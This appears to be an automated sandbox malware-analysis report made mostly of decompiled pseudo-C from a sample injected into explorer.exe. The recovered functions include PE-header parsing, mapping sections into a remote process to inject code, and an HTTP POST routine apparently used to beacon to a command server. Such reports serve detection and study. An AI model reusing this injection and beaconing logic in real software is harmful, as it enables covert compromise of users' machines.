                  0x0008ddcb
                  0x00000000
                  0x00000000
                  0x0008ddcd
                  0x0008ddcd
                  0x0008ddd3
                  0x0008ddef
                  0x0008ddfe
                  0x0008de07
                  0x0008de0c
                  0x0008de0f
                  0x0008de15
                  0x0008de15
                  0x0008de1a
                  0x0008de26
                  0x00000000
                  0x0008de26
                  0x0008ddd8
                  0x00000000
                  0x0008ddd8
                  0x0008dd7b
                  0x0008dda2
                  0x0008dda7
                  0x0008ddac
                  0x0008ddae
                  0x0008ddae
                  0x00000000
                  0x0008ddac
                  0x0008dd7d
                  0x0008dd7d
                  0x0008dd80
                  0x00000000
                  0x00000000
                  0x0008dd86
                  0x0008dd86
                  0x0008dd89
                  0x00000000
                  0x00000000
                  0x0008dd8f
                  0x0008dd8f
                  0x0008dd92
                  0x00000000
                  0x00000000
                  0x0008dd98
                  0x0008dd9b
                  0x00000000
                  0x00000000
                  0x0008dd9d
                  0x00000000
                  0x0008dd9d
                  0x0008dedf
                  0x0008dee5
                  0x0008deeb
                  0x0008deee
                  0x0008def1
                  0x0008def1
                  0x0008def4
                  0x0008def5
                  0x0008def8
                  0x0008defa
                  0x00000000
                  0x00000000
                  0x0008df4a
                  0x0008df4a
                  0x00000000
                  0x0008df4a
                  0x0008dc81
                  0x0008dc87
                  0x00000000
                  0x0008dc87
                  0x0008df47
                  0x00000000
                  0x0008dbca
                  0x0008dbcf
                  0x0008dbd4
                  0x00000000
                  0x0008dbd8

                  APIs
                    • Part of subcall function 0008D523: CoInitializeEx.OLE32(00000000,00000000), ref: 0008D536
                    • Part of subcall function 0008D523: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0008D547
                    • Part of subcall function 0008D523: CoCreateInstance.OLE32(0009B848,00000000,00000001,0009B858,?), ref: 0008D55E
                    • Part of subcall function 0008D523: SysAllocString.OLEAUT32(00000000), ref: 0008D569
                    • Part of subcall function 0008D523: CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0008D594
                    • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                  • SysAllocString.OLEAUT32(00000000), ref: 0008DBE5
                  • SysAllocString.OLEAUT32(00000000), ref: 0008DBF9
                  • SysFreeString.OLEAUT32(?), ref: 0008DF82
                  • SysFreeString.OLEAUT32(?), ref: 0008DF8B
                    • Part of subcall function 0008861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 00088660
                  Strings
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: String$AllocFree$HeapInitialize$AllocateBlanketCreateInstanceProxySecurity
                  • String ID: FALSE$TRUE
                  • API String ID: 1290676130-1412513891
                  • Opcode ID: 44f48047a587ed4ae3496f6ff5f9f3f4d9a45de3618279219bf8f1527d89ff28
                  • Instruction ID: 1b20700aac11c4dae470c7e010e7ba276413c48b0cffd0f81d1503e5e528a265
                  • Opcode Fuzzy Hash: 44f48047a587ed4ae3496f6ff5f9f3f4d9a45de3618279219bf8f1527d89ff28
                  • Instruction Fuzzy Hash: 58E15E71E00219AFDF54FFA4C985EEEBBB9FF48310F14815AE545AB292DB31A901CB50
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0008C6C0, Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 200registryCOMMON
                  Download Yara Rule
                  C-Code - Quality: 59%
                  			E0008C6C0(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				char _v32;
				intOrPtr _v36;
				struct HINSTANCE__* _v40;
				char _v44;
				char _v56;
				char _v72;
				struct _WNDCLASSEXA _v120;
				intOrPtr _t69;
				intOrPtr _t71;
				intOrPtr _t75;
				intOrPtr _t80;
				intOrPtr _t92;
				intOrPtr _t95;
				intOrPtr _t96;
				struct HWND__* _t106;
				intOrPtr* _t113;
				struct HINSTANCE__* _t116;
				intOrPtr _t120;
				intOrPtr _t126;
				intOrPtr _t131;
				intOrPtr _t134;
				intOrPtr _t136;
				intOrPtr _t139;
				char _t140;
				intOrPtr _t141;

				_t69 =  *0x9e688; // 0xb0000
				_t126 = __ecx;
				_t134 = __edx;
				_t116 = 0;
				_v36 = __edx;
				_v16 = 0;
				_v44 = 0;
				_v40 = 0;
				_v12 = 0;
				_v8 = 0;
				_v24 = 0;
				_v20 = __ecx;
				if(( *(_t69 + 0x1898) & 0x00000040) != 0) {
					E0008E23E(0x1f4);
					_t116 = 0;
				}
				_t113 =  *((intOrPtr*)(_t134 + 0x3c)) + _t134;
				_v28 = _t116;
				if( *_t113 != 0x4550) {
					L12:
					if(_v8 != 0) {
						_t75 =  *0x9e780; // 0x0
						 *((intOrPtr*)(_t75 + 0x10))(_t126, _v8);
						_v8 = _v8 & 0x00000000;
					}
					L14:
					if(_v12 != 0) {
						_t136 =  *0x9e780; // 0x0
						 *((intOrPtr*)(_t136 + 0x10))(GetCurrentProcess(), _v12);
					}
					if(_v16 != 0) {
						_t71 =  *0x9e780; // 0x0
						 *((intOrPtr*)(_t71 + 0x20))(_v16);
					}
					return _v8;
				}
				_push(_t116);
				_push(0x8000000);
				_v44 =  *((intOrPtr*)(_t113 + 0x50));
				_push(0x40);
				_push( &_v44);
				_push(_t116);
				_push(0xe);
				_push( &_v16);
				_t80 =  *0x9e780; // 0x0
				if( *((intOrPtr*)(_t80 + 0xc))() < 0) {
					goto L12;
				}
				_v120.style = 0xb;
				_v120.cbSize = 0x30;
				_v120.lpszClassName =  &_v56;
				asm("movsd");
				_v120.lpfnWndProc = DefWindowProcA;
				asm("movsd");
				asm("movsd");
				asm("movsb");
				asm("movsd");
				asm("movsd");
				asm("movsw");
				asm("movsb");
				_v120.cbWndExtra = 0;
				_v120.lpszMenuName = 0;
				_v120.cbClsExtra = 0;
				_v120.hInstance = 0;
				if(RegisterClassExA( &_v120) != 0) {
					_t106 = CreateWindowExA(0,  &_v56,  &_v72, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, 0, 0, 0, 0);
					if(_t106 != 0) {
						DestroyWindow(_t106);
						UnregisterClassA( &_v56, 0);
					}
				}
				_t139 =  *0x9e780; // 0x0
				_push(0x40);
				_push(0);
				_push(2);
				_push( &_v24);
				_push(0);
				_push(0);
				_push(0);
				_push( &_v12);
				_push(GetCurrentProcess());
				_push(_v16);
				if( *((intOrPtr*)(_t139 + 0x14))() < 0) {
					_t126 = _v20;
					goto L12;
				} else {
					_push(0x40);
					_push(0);
					_push(2);
					_push( &_v24);
					_push(0);
					_push(0);
					_push(0);
					_t126 = _v20;
					_push( &_v8);
					_t92 =  *0x9e780; // 0x0
					_push(_t126);
					_push(_v16);
					if( *((intOrPtr*)(_t92 + 0x14))() < 0) {
						goto L12;
					}
					_t140 = E00088669( *0x9e688, 0x1ac4);
					_v32 = _t140;
					if(_t140 == 0) {
						goto L12;
					}
					 *((intOrPtr*)(_t140 + 0x224)) = _v8;
					_t95 =  *0x9e684; // 0xe7f8f0
					_t96 =  *((intOrPtr*)(_t95 + 0x54))(_t126, 0, 0x1ac4, 0x1000, 4);
					_t120 =  *0x9e684; // 0xe7f8f0
					_t131 = _t96;
					 *((intOrPtr*)(_t120 + 0x20))(_v20, _t131, _t140, 0x1ac4,  &_v28);
					E0008861A( &_v32, 0x1ac4);
					_t141 =  *0x9e688; // 0xb0000
					 *0x9e688 = _t131;
					E000886E1(_v12, _v36,  *((intOrPtr*)(_t113 + 0x50)));
					E0008C63F(_v12, _v8, _v36);
					 *0x9e688 = _t141;
					goto L14;
				}
			}


































                  0x0008c6c6
                  0x0008c6cd
                  0x0008c6cf
                  0x0008c6d1
                  0x0008c6d3
                  0x0008c6d6
                  0x0008c6d9
                  0x0008c6dc
                  0x0008c6df
                  0x0008c6e2
                  0x0008c6e5
                  0x0008c6ef
                  0x0008c6f2
                  0x0008c6f9
                  0x0008c6fe
                  0x0008c6fe
                  0x0008c704
                  0x0008c706
                  0x0008c70f
                  0x0008c8b5
                  0x0008c8b9
                  0x0008c8be
                  0x0008c8c4
                  0x0008c8c7
                  0x0008c8c7
                  0x0008c8cb
                  0x0008c8d0
                  0x0008c8d5
                  0x0008c8e2
                  0x0008c8e2
                  0x0008c8eb
                  0x0008c8ed
                  0x0008c8f5
                  0x0008c8f5
                  0x0008c8fc
                  0x0008c8fc
                  0x0008c718
                  0x0008c719
                  0x0008c71e
                  0x0008c724
                  0x0008c726
                  0x0008c727
                  0x0008c728
                  0x0008c72d
                  0x0008c72e
                  0x0008c738
                  0x00000000
                  0x00000000
                  0x0008c743
                  0x0008c74d
                  0x0008c757
                  0x0008c75a
                  0x0008c760
                  0x0008c767
                  0x0008c768
                  0x0008c769
                  0x0008c772
                  0x0008c773
                  0x0008c774
                  0x0008c776
                  0x0008c779
                  0x0008c77c
                  0x0008c77f
                  0x0008c782
                  0x0008c78e
                  0x0008c7b0
                  0x0008c7b8
                  0x0008c7bb
                  0x0008c7c6
                  0x0008c7c6
                  0x0008c7b8
                  0x0008c7cc
                  0x0008c7d5
                  0x0008c7d7
                  0x0008c7d8
                  0x0008c7da
                  0x0008c7db
                  0x0008c7dc
                  0x0008c7dd
                  0x0008c7e1
                  0x0008c7e8
                  0x0008c7e9
                  0x0008c7f1
                  0x0008c8b2
                  0x00000000
                  0x0008c7f7
                  0x0008c7f7
                  0x0008c7f9
                  0x0008c7fa
                  0x0008c7ff
                  0x0008c800
                  0x0008c801
                  0x0008c802
                  0x0008c803
                  0x0008c809
                  0x0008c80a
                  0x0008c80f
                  0x0008c810
                  0x0008c818
                  0x00000000
                  0x00000000
                  0x0008c82e
                  0x0008c830
                  0x0008c837
                  0x00000000
                  0x00000000
                  0x0008c848
                  0x0008c84e
                  0x0008c856
                  0x0008c859
                  0x0008c85f
                  0x0008c86f
                  0x0008c87b
                  0x0008c880
                  0x0008c886
                  0x0008c896
                  0x0008c8a2
                  0x0008c8aa
                  0x00000000
                  0x0008c8aa

                  APIs
                  • RegisterClassExA.USER32 ref: 0008C785
                  • CreateWindowExA.USER32 ref: 0008C7B0
                  • DestroyWindow.USER32 ref: 0008C7BB
                  • UnregisterClassA.USER32(?,00000000), ref: 0008C7C6
                  • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 0008C7E2
                  • GetCurrentProcess.KERNEL32(00000000), ref: 0008C8DB
                    • Part of subcall function 0008861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 00088660
                  Strings
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: ClassCurrentProcessWindow$CreateDestroyFreeHeapRegisterUnregister
                  • String ID: 0$cdcdwqwqwq$sadccdcdsasa
                  • API String ID: 3082384575-2319545179
                  • Opcode ID: da2a3bd41226a2e89f7497ec74bd49478804e8ac160ba7bf55d9b58a49516d1a
                  • Instruction ID: d3e88f71527c21399528f0c4bf061e6e508ee729baa66594f0f525f79852064d
                  • Opcode Fuzzy Hash: da2a3bd41226a2e89f7497ec74bd49478804e8ac160ba7bf55d9b58a49516d1a
                  • Instruction Fuzzy Hash: 49712971900249EFEB10DF95DC49EEEBBB9FB89710F14406AF605A7290DB74AE04CB64
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00085F82, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 104COMMON
                  Download Yara Rule
                  C-Code - Quality: 78%
                  			_entry_(void* __edx, struct HINSTANCE__* _a4, WCHAR* _a8) {
				char _v8;
				char _v16;
				short _v144;
				short _v664;
				void* _t19;
				struct HINSTANCE__* _t22;
				long _t23;
				long _t24;
				char* _t27;
				WCHAR* _t32;
				long _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t49;
				int _t53;
				void* _t54;
				intOrPtr* _t55;
				void* _t57;

				_t49 = __edx;
				OutputDebugStringA("Hello qqq");
				if(_a8 != 1) {
					if(_a8 != 0) {
						L12:
						return 1;
					}
					SetLastError(0xaa);
					L10:
					return 0;
				}
				E000885EF();
				_t19 = E0008980C( &_v16);
				_t57 = _t49;
				if(_t57 < 0 || _t57 <= 0 && _t19 < 0x2e830) {
					goto L12;
				} else {
					E00088F78();
					GetModuleHandleA(0);
					_t22 = _a4;
					 *0x9e69c = _t22;
					_t23 = GetModuleFileNameW(_t22,  &_v664, 0x104);
					_t24 = GetLastError();
					if(_t23 != 0 && _t24 != 0x7a) {
						memset( &_v144, 0, 0x80);
						_t55 = _t54 + 0xc;
						_t53 = 0;
						do {
							_t27 = E000895C7(_t53);
							_a8 = _t27;
							MultiByteToWideChar(0, 0, _t27, 0xffffffff,  &_v144, 0x3f);
							E000885C2( &_a8);
							_t53 = _t53 + 1;
						} while (_t53 < 0x2710);
						E00092A5B( *0x9e69c);
						 *_t55 = 0x7c3;
						 *0x9e684 = E0008E1BC(0x9ba28, 0x11c);
						 *_t55 = 0xb4e;
						_t32 = E000895E1(0x9ba28);
						_a8 = _t32;
						_t33 = GetFileAttributesW(_t32);
						_push( &_a8);
						if(_t33 == 0xffffffff) {
							E000885D5();
							_v8 = 0;
							_t37 =  *0x9e684; // 0xe7f8f0
							_t38 =  *((intOrPtr*)(_t37 + 0x70))(0, 0, E00085E06, 0, 0,  &_v8);
							 *0x9e6a8 = _t38;
							if(_t38 == 0) {
								goto L10;
							}
							goto L12;
						}
						E000885D5();
					}
					goto L10;
				}
			}





















                  0x00085f82
                  0x00085f92
                  0x00085f9c
                  0x000860d0
                  0x000860c3
                  0x00000000
                  0x000860c5
                  0x000860d7
                  0x00086098
                  0x00000000
                  0x00086098
                  0x00085fa2
                  0x00085faa
                  0x00085fb1
                  0x00085fb3
                  0x00000000
                  0x00085fc6
                  0x00085fc6
                  0x00085fcc
                  0x00085fd2
                  0x00085fe2
                  0x00085fe7
                  0x00085fef
                  0x00085ff7
                  0x00086013
                  0x00086018
                  0x0008601b
                  0x0008601d
                  0x0008601f
                  0x0008602c
                  0x00086035
                  0x0008603e
                  0x00086043
                  0x00086044
                  0x00086052
                  0x0008605c
                  0x0008606d
                  0x00086072
                  0x00086079
                  0x00086080
                  0x00086083
                  0x0008608f
                  0x00086090
                  0x0008609c
                  0x000860a5
                  0x000860a9
                  0x000860b7
                  0x000860ba
                  0x000860c1
                  0x00000000
                  0x00000000
                  0x00000000
                  0x000860c1
                  0x00086092
                  0x00086097
                  0x00000000
                  0x00085ff7

                  APIs
                  • OutputDebugStringA.KERNEL32(Hello qqq), ref: 00085F92
                  • SetLastError.KERNEL32(000000AA), ref: 000860D7
                    • Part of subcall function 000885EF: HeapCreate.KERNELBASE(00000000,00080000,00000000,00085FA7), ref: 000885F8
                    • Part of subcall function 0008980C: GetSystemTimeAsFileTime.KERNEL32(?,?,00085FAF), ref: 00089819
                    • Part of subcall function 0008980C: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00089839
                  • GetModuleHandleA.KERNEL32(00000000), ref: 00085FCC
                  • GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 00085FE7
                  • GetLastError.KERNEL32 ref: 00085FEF
                  • memset.MSVCRT ref: 00086013
                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,0000003F), ref: 00086035
                  • GetFileAttributesW.KERNEL32(00000000), ref: 00086083
                  Strings
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: File$ErrorLastModuleTime$AttributesByteCharCreateDebugHandleHeapMultiNameOutputStringSystemUnothrow_t@std@@@Wide__ehfuncinfo$??2@memset
                  • String ID: Hello qqq
                  • API String ID: 1203100507-3610097158
                  • Opcode ID: 8b96a12faa54738855b03958d39a9c9ad27c69214fa689d017f1ccf1e08c0267
                  • Instruction ID: 5d8fc15084eb67a1e967e79224f0c4bd4c543ae9b3caa409572413b5ae1d139a
                  • Opcode Fuzzy Hash: 8b96a12faa54738855b03958d39a9c9ad27c69214fa689d017f1ccf1e08c0267
                  • Instruction Fuzzy Hash: AD31A771900544ABEB64BF30DC49EAF37B8FB81720F10852AF495C6292DF389A49DF21
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0008E668, Relevance: 15.3, APIs: 9, Strings: 1, Instructions: 305COMMON
                  Download Yara Rule
                  C-Code - Quality: 83%
                  			E0008E668(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr _a24) {
				char _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				char _v64;
				int _v76;
				void* _v80;
				intOrPtr _v100;
				int _v104;
				void* _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				char* _v120;
				void _v124;
				char _v140;
				void _v396;
				void _v652;
				intOrPtr _t105;
				intOrPtr _t113;
				intOrPtr* _t115;
				intOrPtr _t118;
				intOrPtr _t121;
				intOrPtr _t124;
				intOrPtr _t127;
				intOrPtr _t131;
				char _t133;
				intOrPtr _t136;
				char _t138;
				char _t139;
				intOrPtr _t141;
				intOrPtr _t147;
				intOrPtr _t154;
				intOrPtr _t158;
				intOrPtr _t162;
				intOrPtr _t164;
				intOrPtr _t166;
				intOrPtr _t172;
				intOrPtr _t176;
				void* _t183;
				void* _t185;
				intOrPtr _t186;
				char _t195;
				intOrPtr _t203;
				intOrPtr _t204;
				signed int _t209;
				void _t212;
				intOrPtr _t213;
				void* _t214;
				intOrPtr _t216;
				char _t217;
				intOrPtr _t218;
				signed int _t219;
				signed int _t220;
				void* _t221;

				_v40 = _v40 & 0x00000000;
				_v24 = 4;
				_v36 = 1;
				_t214 = __edx;
				memset( &_v396, 0, 0x100);
				memset( &_v652, 0, 0x100);
				_v64 = E000895C7(0x85b);
				_v60 = E000895C7(0xdc9);
				_v56 = E000895C7(0x65d);
				_v52 = E000895C7(0xdd3);
				_t105 = E000895C7(0xb74);
				_v44 = _v44 & 0;
				_t212 = 0x3c;
				_v48 = _t105;
				memset( &_v124, 0, 0x100);
				_v116 = 0x10;
				_v120 =  &_v140;
				_v124 = _t212;
				_v108 =  &_v396;
				_v104 = 0x100;
				_v80 =  &_v652;
				_push( &_v124);
				_push(0);
				_v76 = 0x100;
				_push(E0008C379(_t214));
				_t113 =  *0x9e6a4; // 0x2790788
				_push(_t214);
				if( *((intOrPtr*)(_t113 + 0x28))() != 0) {
					_t209 = 0;
					_v20 = 0;
					do {
						_t115 =  *0x9e6a4; // 0x2790788
						_v12 = 0x8404f700;
						_t213 =  *_t115( *0x9e788,  *((intOrPtr*)(_t221 + _t209 * 4 - 0x24)), 0, 0, 0);
						if(_t213 != 0) {
							_t195 = 3;
							_t185 = 4;
							_v8 = _t195;
							_t118 =  *0x9e6a4; // 0x2790788
							 *((intOrPtr*)(_t118 + 0x14))(_t213, _t195,  &_v8, _t185);
							_v8 = 0x3a98;
							_t121 =  *0x9e6a4; // 0x2790788
							 *((intOrPtr*)(_t121 + 0x14))(_t213, 2,  &_v8, _t185);
							_v8 = 0x493e0;
							_t124 =  *0x9e6a4; // 0x2790788
							 *((intOrPtr*)(_t124 + 0x14))(_t213, 6,  &_v8, _t185);
							_v8 = 0x493e0;
							_t127 =  *0x9e6a4; // 0x2790788
							 *((intOrPtr*)(_t127 + 0x14))(_t213, 5,  &_v8, _t185);
							_t131 =  *0x9e6a4; // 0x2790788
							_t186 =  *((intOrPtr*)(_t131 + 0x1c))(_t213,  &_v396, _v100, 0, 0, 3, 0, 0);
							if(_a24 != 0) {
								E0008980C(_a24);
							}
							if(_t186 != 0) {
								_t133 = 0x8484f700;
								if(_v112 != 4) {
									_t133 = _v12;
								}
								_t136 =  *0x9e6a4; // 0x2790788
								_t216 =  *((intOrPtr*)(_t136 + 0x20))(_t186, "POST",  &_v652, 0, 0,  &_v64, _t133, 0);
								_v8 = _t216;
								if(_a24 != 0) {
									E0008980C(_a24);
								}
								if(_t216 != 0) {
									_t138 = 4;
									if(_v112 != _t138) {
										L19:
										_t139 = E000895C7(0x777);
										_t217 = _t139;
										_v12 = _t217;
										_t141 =  *0x9e6a4; // 0x2790788
										_t218 = _v8;
										_v28 =  *((intOrPtr*)(_t141 + 0x24))(_t218, _t217, E0008C379(_t217), _a4, _a8);
										E000885C2( &_v12);
										if(_a24 != 0) {
											E0008980C(_a24);
										}
										if(_v28 != 0) {
											L28:
											_v24 = 8;
											_push(0);
											_v32 = 0;
											_v28 = 0;
											_push( &_v24);
											_push( &_v32);
											_t147 =  *0x9e6a4; // 0x2790788
											_push(0x13);
											_push(_t218);
											if( *((intOrPtr*)(_t147 + 0xc))() != 0) {
												_t219 = E00089749( &_v32);
												if(_t219 == 0xc8) {
													 *_a20 = _v8;
													 *_a12 = _t213;
													 *_a16 = _t186;
													return 0;
												}
												_t220 =  ~_t219;
												L32:
												_t154 =  *0x9e6a4; // 0x2790788
												 *((intOrPtr*)(_t154 + 8))(_v8);
												L33:
												if(_t186 != 0) {
													_t158 =  *0x9e6a4; // 0x2790788
													 *((intOrPtr*)(_t158 + 8))(_t186);
												}
												if(_t213 != 0) {
													_t203 =  *0x9e6a4; // 0x2790788
													 *((intOrPtr*)(_t203 + 8))(_t213);
												}
												return _t220;
											}
											GetLastError();
											_t220 = 0xfffffff8;
											goto L32;
										} else {
											GetLastError();
											_t162 =  *0x9e6a4; // 0x2790788
											 *((intOrPtr*)(_t162 + 8))(_t218);
											_t218 = 0;
											goto L23;
										}
									}
									_v12 = _t138;
									_push( &_v12);
									_push( &_v16);
									_t172 =  *0x9e6a4; // 0x2790788
									_push(0x1f);
									_push(_t216);
									if( *((intOrPtr*)(_t172 + 0x18))() == 0) {
										L18:
										GetLastError();
										goto L19;
									}
									_v16 = _v16 | 0x00003380;
									_push(4);
									_push( &_v16);
									_t176 =  *0x9e6a4; // 0x2790788
									_push(0x1f);
									_push(_t216);
									if( *((intOrPtr*)(_t176 + 0x14))() != 0) {
										goto L19;
									}
									goto L18;
								} else {
									GetLastError();
									L23:
									_t164 =  *0x9e6a4; // 0x2790788
									 *((intOrPtr*)(_t164 + 8))(_t186);
									_t186 = 0;
									goto L24;
								}
							} else {
								GetLastError();
								L24:
								_t166 =  *0x9e6a4; // 0x2790788
								 *((intOrPtr*)(_t166 + 8))(_t213);
								_t213 = 0;
								goto L25;
							}
						}
						GetLastError();
						L25:
						_t204 = _t218;
						_t209 = _v20 + 1;
						_v20 = _t209;
					} while (_t209 < 2);
					_v8 = _t218;
					if(_t204 != 0) {
						goto L28;
					}
					_t220 = 0xfffffffe;
					goto L33;
				}
				_t183 = 0xfffffffc;
				return _t183;
			}



































































                  0x0008e671
                  0x0008e683
                  0x0008e68c
                  0x0008e696
                  0x0008e69a
                  0x0008e6ab
                  0x0008e6c2
                  0x0008e6cf
                  0x0008e6dc
                  0x0008e6e9
                  0x0008e6ec
                  0x0008e6f1
                  0x0008e6f6
                  0x0008e6f8
                  0x0008e700
                  0x0008e70b
                  0x0008e712
                  0x0008e71e
                  0x0008e721
                  0x0008e72f
                  0x0008e732
                  0x0008e738
                  0x0008e739
                  0x0008e73b
                  0x0008e744
                  0x0008e745
                  0x0008e74a
                  0x0008e750
                  0x0008e75a
                  0x0008e75c
                  0x0008e761
                  0x0008e761
                  0x0008e770
                  0x0008e77f
                  0x0008e783
                  0x0008e792
                  0x0008e795
                  0x0008e79a
                  0x0008e79e
                  0x0008e7a5
                  0x0008e7ac
                  0x0008e7b4
                  0x0008e7bc
                  0x0008e7c3
                  0x0008e7cb
                  0x0008e7d3
                  0x0008e7da
                  0x0008e7e2
                  0x0008e7ea
                  0x0008e7ff
                  0x0008e80c
                  0x0008e80e
                  0x0008e813
                  0x0008e813
                  0x0008e81a
                  0x0008e82b
                  0x0008e830
                  0x0008e832
                  0x0008e832
                  0x0008e846
                  0x0008e858
                  0x0008e85a
                  0x0008e85d
                  0x0008e862
                  0x0008e862
                  0x0008e869
                  0x0008e878
                  0x0008e87c
                  0x0008e8ba
                  0x0008e8bf
                  0x0008e8c7
                  0x0008e8cc
                  0x0008e8d7
                  0x0008e8dd
                  0x0008e8e7
                  0x0008e8ea
                  0x0008e8f3
                  0x0008e8f8
                  0x0008e8f8
                  0x0008e901
                  0x0008e94a
                  0x0008e94c
                  0x0008e953
                  0x0008e954
                  0x0008e957
                  0x0008e95d
                  0x0008e961
                  0x0008e962
                  0x0008e967
                  0x0008e969
                  0x0008e96f
                  0x0008e984
                  0x0008e98c
                  0x0008e9c1
                  0x0008e9c6
                  0x0008e9cb
                  0x00000000
                  0x0008e9cd
                  0x0008e98e
                  0x0008e990
                  0x0008e990
                  0x0008e999
                  0x0008e99c
                  0x0008e99e
                  0x0008e9a0
                  0x0008e9a6
                  0x0008e9a6
                  0x0008e9ab
                  0x0008e9ad
                  0x0008e9b4
                  0x0008e9b4
                  0x00000000
                  0x0008e9b7
                  0x0008e971
                  0x0008e979
                  0x00000000
                  0x0008e903
                  0x0008e903
                  0x0008e909
                  0x0008e90f
                  0x0008e912
                  0x00000000
                  0x0008e912
                  0x0008e901
                  0x0008e87e
                  0x0008e884
                  0x0008e888
                  0x0008e889
                  0x0008e88e
                  0x0008e890
                  0x0008e896
                  0x0008e8b4
                  0x0008e8b4
                  0x00000000
                  0x0008e8b4
                  0x0008e898
                  0x0008e8a2
                  0x0008e8a4
                  0x0008e8a5
                  0x0008e8aa
                  0x0008e8ac
                  0x0008e8b2
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0008e86b
                  0x0008e86b
                  0x0008e914
                  0x0008e914
                  0x0008e91a
                  0x0008e91d
                  0x00000000
                  0x0008e91d
                  0x0008e81c
                  0x0008e81c
                  0x0008e91f
                  0x0008e91f
                  0x0008e925
                  0x0008e928
                  0x00000000
                  0x0008e928
                  0x0008e81a
                  0x0008e785
                  0x0008e92a
                  0x0008e92d
                  0x0008e92f
                  0x0008e932
                  0x0008e935
                  0x0008e93e
                  0x0008e943
                  0x00000000
                  0x00000000
                  0x0008e947
                  0x00000000
                  0x0008e947
                  0x0008e754
                  0x00000000

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: memset$ErrorLast
                  • String ID: POST
                  • API String ID: 2570506013-1814004025
                  • Opcode ID: 367a7a72f7db2160077767910a4473ccd00a1e93e961edb2d3cd1ed941d500fc
                  • Instruction ID: ea6434b96816f391ca67125378d8c048189af0a816e14d9e93347baa296bf716
                  • Opcode Fuzzy Hash: 367a7a72f7db2160077767910a4473ccd00a1e93e961edb2d3cd1ed941d500fc
                  • Instruction Fuzzy Hash: 50B13C71900208AFEB55EFA4DC89EAE7BB8FF58310F10406AF545EB291DB749E44CB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 000916B8, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 70libraryloaderCOMMON
                  Download Yara Rule
                  C-Code - Quality: 28%
                  			E000916B8(signed int* _a4) {
				char _v8;
				_Unknown_base(*)()* _v12;
				_Unknown_base(*)()* _v16;
				char _v20;
				_Unknown_base(*)()* _t16;
				_Unknown_base(*)()* _t17;
				void* _t22;
				intOrPtr* _t28;
				signed int _t29;
				signed int _t30;
				struct HINSTANCE__* _t32;
				void* _t34;

				_t30 = 0;
				_v8 = 0;
				_t32 = GetModuleHandleA("advapi32.dll");
				if(_t32 == 0) {
					L9:
					return 1;
				}
				_t16 = GetProcAddress(_t32, "CryptAcquireContextA");
				_v12 = _t16;
				if(_t16 == 0) {
					goto L9;
				}
				_t17 = GetProcAddress(_t32, "CryptGenRandom");
				_v16 = _t17;
				if(_t17 == 0) {
					goto L9;
				}
				_t28 = GetProcAddress(_t32, "CryptReleaseContext");
				if(_t28 == 0) {
					goto L9;
				}
				_push(0xf0000000);
				_push(1);
				_push(0);
				_push(0);
				_push( &_v8);
				if(_v12() == 0) {
					goto L9;
				}
				_t22 = _v16(_v8, 4,  &_v20);
				 *_t28(_v8, 0);
				if(_t22 == 0) {
					goto L9;
				}
				_t29 = 0;
				do {
					_t30 = _t30 << 0x00000008 |  *(_t34 + _t29 - 0x10) & 0x000000ff;
					_t29 = _t29 + 1;
				} while (_t29 < 4);
				 *_a4 = _t30;
				return 0;
			}















                  0x000916c1
                  0x000916c8
                  0x000916d1
                  0x000916d5
                  0x00091750
                  0x00000000
                  0x00091752
                  0x000916e3
                  0x000916e5
                  0x000916ea
                  0x00000000
                  0x00000000
                  0x000916f2
                  0x000916f4
                  0x000916f9
                  0x00000000
                  0x00000000
                  0x00091703
                  0x00091707
                  0x00000000
                  0x00000000
                  0x00091709
                  0x0009170e
                  0x00091710
                  0x00091711
                  0x00091715
                  0x0009171b
                  0x00000000
                  0x00000000
                  0x00091726
                  0x0009172f
                  0x00091733
                  0x00000000
                  0x00000000
                  0x00091735
                  0x00091737
                  0x0009173f
                  0x00091741
